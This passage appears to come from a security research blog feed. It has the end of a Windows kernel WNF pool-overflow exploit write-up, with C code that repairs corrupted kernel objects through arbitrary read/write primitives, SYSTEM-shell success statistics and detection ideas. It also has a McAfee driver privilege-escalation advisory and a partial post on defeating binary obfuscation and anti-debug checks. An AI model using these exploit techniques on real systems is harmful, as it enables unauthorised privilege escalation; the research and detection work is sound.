            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted the RunRef member of many _WNF_NAME_INSTANCEs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see, there is a member TemporaryNamesListHead which heads a linked list of the TemporaryNameListEntry members within each _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    // The list is circular: the Flink of the head points at the first
    // entry, so we walk until we arrive back at the head itself.
    LPVOID head = (char*)wnf_process_context_ptr + 0x40;
    LPVOID ptr;

    for (ptr = read64(head); ptr != head; ptr = read64(ptr))
    {
        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        // Subtract the offset (17 * 8 == 0x88) to recover the base of
        // the containing _WNF_NAME_INSTANCE.
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I needed to obtain the NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into a wait state, we can walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset, we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14
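The walk itself is simple once the read primitive is available. The sketch below is a simulation only: read64() stands in for the WNF-based arbitrary read, the RVA is a placeholder rather than a real symbol offset, and the matching heuristic (a canonical kernel-mode address whose low 16 bits equal those of the known RVA, bits which survive the ASLR slide given the image base alignment) is one plausible way of spotting the known return address:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simulated "kernel memory": in the real exploit read64() would be the
 * WNF-based arbitrary read primitive; here it simply dereferences. */
static uint64_t read64(const uint64_t *addr) { return *addr; }

/* Hypothetical RVA of a known return address (e.g. into
 * nt!KiSystemServiceExit) for the build under attack - placeholder. */
#define KNOWN_RET_RVA 0x40595fULL

/* Walk the stack slots of a waiting thread looking for a kernel-mode
 * return address whose low 16 bits match the known RVA; subtracting
 * the RVA from the match yields the NTOSKRNL base. */
uint64_t find_ntoskrnl_base(const uint64_t *stack, size_t slots)
{
    for (size_t i = 0; i < slots; i++) {
        uint64_t q = read64(&stack[i]);
        if ((q >> 48) == 0xFFFF && (q & 0xFFFF) == (KNOWN_RET_RVA & 0xFFFF))
            return q - KNOWN_RET_RVA;
    }
    return 0; /* not found */
}
```

In the real exploit the stack region itself would first be located via the waiting thread's KTHREAD (e.g. its StackBase/StackLimit fields), read out with the arbitrary read primitive, and then scanned as above.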

Exploit Testing and Statistics

As there are some elements of instability and non-determinism in this exploit, an exploit testing framework was developed to determine its effectiveness across multiple runs, on multiple supported platforms, and with varying exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system, with potentially other third-party drivers installed and a noisier kernel pool, it gives some indication of whether this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All of these are measured over 100 iterations of the exploit (over 5 runs), with a timeout of 15 seconds per iteration (i.e. an iteration was counted as successful if a BSOD did not occur within 15 seconds of executing the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type by reaching the maximum number of overflow attempts. 32 was chosen as a semi-arbitrary value based on empirical testing and the fact that blocks in the BlockBitmap for the LFH are scanned in groups of 32.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 85 82 76 75 75 78
Total LFH writes 708 726 707 678 624 688
Avg LFH writes 8 8 9 9 8 8
Failed after 32 1 3 2 1 1 2
BSODs on exec 14 15 22 24 24 20
Unmapped Read 4 5 8 6 10 7

Spray size 6000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 80 78 84 79 81
Total LFH writes 674 643 696 762 706 696
Avg LFH writes 8 8 9 9 8 8
Failed after 32 2 4 3 3 4 3
BSODs on exec 14 16 19 13 17 16
Unmapped Read 2 4 4 5 4 4

Spray size 10000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 85 87 85 86 85
Total LFH writes 805 714 761 688 694 732
Avg LFH writes 9 8 8 8 8 8
Failed after 32 3 5 3 3 3 3
BSODs on exec 13 10 10 12 11 11
Unmapped Read 1 0 1 1 0 1

Spray size 20000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 89 90 94 90 90 91
Total LFH writes 624 763 657 762 650 691
Avg LFH writes 7 8 7 8 7 7
Failed after 32 3 2 1 2 2 2
BSODs on exec 8 8 5 8 8 7
Unmapped Read 0 0 0 0 1 0

From this we can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reduces the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post-exploitation method used (token stealing vs modifying the existing token). The reason is that with the token-stealing method there are more kernel reads/writes and a longer duration before PreviousMode is reverted.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
PRIV shells 94 92 93 92 89 92
Total LFH writes 939 825 825 788 724 820
Avg LFH writes 9 8 8 8 8 8
Failed after 32 2 2 1 2 0 1
BSODs on exec 4 6 6 6 11 6
Unmapped Read 0 1 1 2 2 1

Therefore, there is only a negligible difference between these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well, firstly, a patch has been out for this vulnerability since the 8th of June 2021. If you're reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this exercise, and from detecting memory corruption exploits in the wild in general. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post-exploitation technique detection (token stealing etc.) which has been covered in many online articles. As I never had access to the in-the-wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should give security researchers a greater understanding of this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited at low integrity (and thus from a sandbox), the detection mechanisms would vary based on whether an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser renderer process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome did not trigger either of the events while loading a new tab and web page. I didn’t explore too deeply whether there were any renderer operations which could trigger this non-maliciously, but this provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash dumps are a very good way to detect unreliable exploitation techniques, or cases where an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well-known example of Microsoft using this to identify an 0day from their WER telemetry. That one was found by looking for shellcode; however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes.

In the case of this specific vulnerability being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur, which could act as a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution, once kernel code execution or SYSTEM has been gained, an attacker may simply disable the telemetry or sanitise it afterwards, especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more successful and less likely to cause instability on the target system than a simple POC. However, we can only achieve around a 90% success rate due to the techniques used. This seems to be about the limit with this approach, without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability, and of detecting memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

Technical Advisory – NULL Pointer Dereference in McAfee Drive Encryption (CVE-2021-23893)

4 October 2021 at 15:37
Vendor: McAfee
Vendor URL: https://kc.mcafee.com/corporate/index?page=content&id=sb10361
Versions affected: Prior to 7.3.0 HF1
Systems Affected: Windows OSs without NULL page protection 
Author: Balazs Bucsay <balazs.bucsay[ at ]nccgroup[.dot.]com> @xoreipeip
CVE Identifier: CVE-2021-23893
Risk: 8.8 - CWE-269: Improper Privilege Management

Summary

McAfee’s Complete Data Protection package contained the Drive Encryption (DE) software. This software was used to transparently encrypt the drive contents. The versions prior to 7.3.0 HF1 had a vulnerability in the kernel driver MfeEpePC.sys that could be exploited on certain Windows systems for privilege escalation or DoS.

Impact

Privilege Escalation vulnerability in a Windows system driver of McAfee Drive Encryption (DE) prior to 7.3.0 could allow a local non-admin user to gain elevated system privileges via exploiting an unutilized memory buffer.

Details

The Drive Encryption software’s kernel driver was loaded to the kernel at boot time and certain IOCTLs were available for low-privileged users.

One of the available IOCTLs referenced an event that was set to NULL before initialization. If the IOCTL was called at the right time, the procedure used NULL as an event and referenced the non-existent structure on the NULL page.

If the user mapped the NULL page and created a fake structure there that mimicked a real Event structure, it was possible to manipulate certain regions of memory and eventually execute code in the kernel.

Recommendation

Install or update to Drive Encryption 7.3.0 HF1, which fixes this vulnerability.

Vendor Communication

February 24, 2021: Vulnerability was reported to McAfee

March 9, 2021: McAfee was able to reproduce the crash with the originally provided DoS exploit

October 1, 2021: McAfee released the new version of DE, which fixes the issue

Acknowledgements

Thanks to Cedric Halbronn for his support during the development of the exploit.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity. 

Published date:  October 4, 2021

Written by:  Balazs Bucsay

A Look At Some Real-World Obfuscation Techniques

12 October 2021 at 13:00

Among the variety of penetration testing engagements NCC Group delivers, some – often within the gaming industry – require performing the assignment in a blackbox fashion against an obfuscated binary, and the client’s priorities revolve more around evaluating the strength of their obfuscation against content protection violations, rather than exercising the application’s security boundaries.

The following post aims at providing insight into the tools and methods used to conduct those engagements using real-world examples. While this approach allows for describing techniques employed by actual protections, only a subset of the material can be explicitly listed here (see disclaimer for more information).

Unpacking Phase

When first attempting to analyze a hostile binary, the initial step is generally to unpack the actual contents of its sections from runtime memory. The standard way to proceed consists of letting the executable run until the unpacking stub has finished deobfuscating, decompressing and/or deciphering the executable’s sections. The unpacked binary can then be reconstructed by dumping the recovered sections into a new executable and (usually) rebuilding the imports section from the recovered IAT (Import Address Table).

This can be accomplished in many ways including:

  • Debugging manually and using plugins such as Scylla to reconstruct the imports section
  • Python scripting leveraging Windows debugging libraries like winappdbg and executable file format libraries like pefile
  • Intel Pintools dynamically instrumenting the binary at run-time (JIT instrumentation mode recommended to avoid integrity checks)

Expectedly, these approaches can be thwarted by anti-debug and various detection mechanisms which, in turn, can be evaded via more debugger plugins such as ScyllaHide or by implementing various hooks such as those highlighted by ICPin. Finally, the original entry point of the application can usually be identified by its immediate calls to the C++ runtime’s internal initialization functions such as _initterm() and _initterm_e().

While the dynamic method is usually sufficient, the samples below highlight two automated implementations that were used successfully: a Python script handling a simple packer that did not require imports rebuilding, and a versatile (albeit slower) dynamic execution engine allowing a more granular approach, fit to uncover specific behaviors.

Control Flow Flattening

Once unpacked, the binary under investigation exposes a number of functions obfuscated using control flow graph (CFG) flattening, a variety of anti-debug mechanisms, and integrity checks. These can be identified as a preliminary step by running the binary instrumented under ICPin (sample output below).

Overview

When disassembled, the CFG of each obfuscated function exhibits the pattern below: a state variable has been added to the original flow, which gets initialized in the function prologue, and the branching structure has been replaced by a loop of pointer-table-based dispatchers (highlighted in white).

Each dispatch loop level contains between 2 and 16 indirect jumps to basic blocks (BBLs) actually implementing the function’s logic.

There are a number of ways to approach this problem, but the CFG flattening implemented here can be handled using a fully symbolic approach that does not require a dynamic engine, nor a real memory context. The first step is, for each function, to identify the loop using a loop-matching algorithm, then run a symbolic engine through it, iterating over all the possible index values and building an index-to-offset map, with the original function’s logic implemented within the BBL-chains located between the blocks belonging to the loop:
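To make the index-to-offset idea concrete, here is a deliberately tiny C analogue (all names are invented; the real pass drives a symbolic engine over x86 blocks, not function pointers): each possible state value is pushed through the dispatcher once and the successor it selects is recorded, which is exactly the map later used to rewire the BBL-chains.

```c
#include <assert.h>

/* Toy flattened function: a state variable drives a dispatch table,
 * mimicking the obfuscated CFG layout described above. */
#define ST_INIT  0
#define ST_WORK  1
#define ST_EXIT  2
#define ST_COUNT 3

typedef int (*bbl_fn)(int *state);

static int bbl_init(int *state) { *state = ST_WORK; return 1; }
static int bbl_work(int *state) { *state = ST_EXIT; return 1; }
static int bbl_exit(int *state) { (void)state; return 0; }

static bbl_fn dispatch_table[ST_COUNT] = { bbl_init, bbl_work, bbl_exit };

/* Symbolic-execution analogue: run each BBL chain once for every index
 * and record the successor it selects, yielding the index-to-offset map. */
void build_index_map(int successors[ST_COUNT])
{
    for (int idx = 0; idx < ST_COUNT; idx++) {
        int state = idx;
        int alive = dispatch_table[idx](&state);
        successors[idx] = alive ? state : -1; /* -1 marks a terminal BBL */
    }
}
```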

Real Destination(s) Recovery

The following steps consist of leveraging the index-to-offset map to reconnect these BBL-chains with each other, and recreate the original control-flow graph. As can be seen in the captures below, the value of the state variable is set using instruction-level obfuscation. Some BBL-chains only bear a static possible destination which can be swiftly evaluated.

For dynamic-destination BBL-chains, once the register used as a state variable has been identified, the next step is to identify the determinant symbols, i.e, the registers and memory locations (globals or local variables) that affect the value of the state register when re-entering the dispatch loop.

This can be accomplished by computing the intermediate language representation (IR) of the assembly flow graph (or BBLs) and building a dependency graph from it. Here we are taking advantage of a limitation of the obfuscator: the determinants for multi-destination BBLs are always contained within the BBL subgraph formed between two dispatchers.

With those determinants identified, the task that remains is to identify what condition these determinants are fulfilling, as well as what destinations in code we jump to once the condition has been evaluated. The Z3 SMT solver from Microsoft is traditionally used around dynamic symbolic engines (DSE) as a means of finding input values leading to new paths. Here, the deobfuscator uses its capabilities to identify the type of comparison the instructions are replacing.

For example, for the equal pattern, the code asks Z3 if 2 valid destination indexes (D1 and D2) exist such that:

  • If the determinants are equal, the value of the state register is equal to D1
  • If the determinants are different, the value of the state register is equal to D2

Finally, the corresponding instruction can be assembled and patched into the assembly, replacing the identified patterns with equivalent assembly sequences such as the ones below, where

  • mod0 and mod1 are the identified determinants
  • #SREG is the state register, now free to be repurposed to store the value of one of the determinants (which may be stored in memory)
  • #OFFSET0 is the offset corresponding to the destination index if the tested condition is true
  • #OFFSET1 is the offset corresponding to the destination index if the tested condition is false
class EqualPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JZ    #OFFSET0
NOP
JMP   #OFFSET1
'''

class UnsignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JA    #OFFSET0
NOP
JMP   #OFFSET1
'''

class SignedGreaterPattern(Pattern):
assembly = '''
MOV   #SREG, mod0
CMP   #SREG, mod1
JG    #OFFSET0
NOP
JMP   #OFFSET1
'''

The resulting CFG, since every original block has been reattached directly to its real target(s), effectively separates the dispatch loop from the significant BBLs. Below is the result of this first pass against a sample function:

This approach does not aim at handling all possible theoretical cases; it takes advantage of the fact that the obfuscator only transforms a small set of arithmetic operations.

Integrity Check Removal

Once the flow graph has been unflattened, the next step is to remove the integrity checks. These can mostly be identified using a simple graph matching algorithm (using Miasm’s “MatchGraphJoker” expressions) which also constitutes a weakness in the obfuscator. In order to account for some corner cases, the detection logic implemented here involves symbolically executing the identified loop candidates, and recording their reads against the .text section in order to provide a robust identification.

On the above graph, the hash verification flow is highlighted in yellow and the failure case (in this case, sending the execution to an address with invalid instructions) in red. Once the loop has been positively identified, the script simply links the green basic blocks to remove the hash check entirely.

“Dead” Instructions Removal

The resulting assembly is unflattened, and does not include the integrity checks anymore, but still includes a number of “dead” instructions which do not have any effect on the function’s logic and can be removed. For example, in the sample below, the value of EAX is not accessed between its first assignment and its subsequent ones. Consequently, the first assignment of EAX, regardless of the path taken, can be safely removed without altering the function’s logic.

start:
    MOV   EAX, 0x1234
    TEST  EBX, EBX
    JNZ   path1
path0:
    XOR   EAX, EAX
path1:
    MOV   EAX, 0x1

Using a dependency graph (depgraph) again, but this time, keeping a map of ASM <-> IR (one-to-many), the following pass removes the assembly instructions for which the depgraph has determined all corresponding IRs are non-performative.

Finally, the framework-provided simplifications, such as bbl-merger, can be applied automatically to each block bearing a single successor, provided the successor only has a single predecessor. The error paths can also be identified and “cauterized”; this should be a no-op since they should never be executed, but it smooths the rebuilding of the executable.

A Note On Antidebug Mechanisms

While a number of canonical anti-debug techniques were identified in the samples; only a few will be covered here as the techniques are well-known and can be largely ignored.

PEB->isBeingDebugged

In the example below, the function checks the PEB for isBeingDebugged (offset 0x2) and sends the execution into a stack-mangling loop before continuing execution, which leads to a certain crash, obfuscating the context from a naive debugging attempt.

Debug Interrupts

Another mechanism involves debug software interrupts and vectored exception handlers, but is rendered easily comprehensible once the function has been processed. The code first sets two local variables to pseudorandom constant values, then registers a vectored exception handler via a call to AddVectoredExceptionHandler. An INT 0x3 (debug interrupt) instruction is then executed (via the indirect call to ISSUE_INT3_FN), but encoded using the long form of the instruction: 0xCD 0x03.

After executing the INT 0x3 instruction, the code flow is resumed in the exception handler as can be seen below.

If the exception code from the EXCEPTION_RECORD structure is a debug breakpoint, a bitwise NOT is applied to one of the constants stored on the stack. Additionally, the Windows interrupt handler handles every debug exception assuming it stemmed from executing the short version of the instruction (0xCC), so were a debugger to intercept the exception, those two elements would need to be taken into consideration in order for execution to continue normally.

Upon continuing execution, a small arithmetic operation checks that the addition of one of the initially set constants (0x8A7B7A99) and a third one (0x60D7B571) is equal to the bitwise NOT of the second initial constant (0x14ACCFF5), which is the operation performed by the exception handler.

0x8A7B7A99 + 0x60D7B571 == 0xEB53300A == ~0x14ACCFF5
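A quick check of the arithmetic (all three constants are taken from the sample above; the addition wraps modulo 2^32):

```c
#include <assert.h>
#include <stdint.h>

/* Constants observed in the anti-debug flow: the exception handler NOTs
 * the second constant on the stack, and the continuation verifies that
 * the first plus the third equals that NOT (truncated to 32 bits). */
int antidebug_check_passes(void)
{
    uint32_t c0 = 0x8A7B7A99u, c1 = 0x14ACCFF5u, c2 = 0x60D7B571u;
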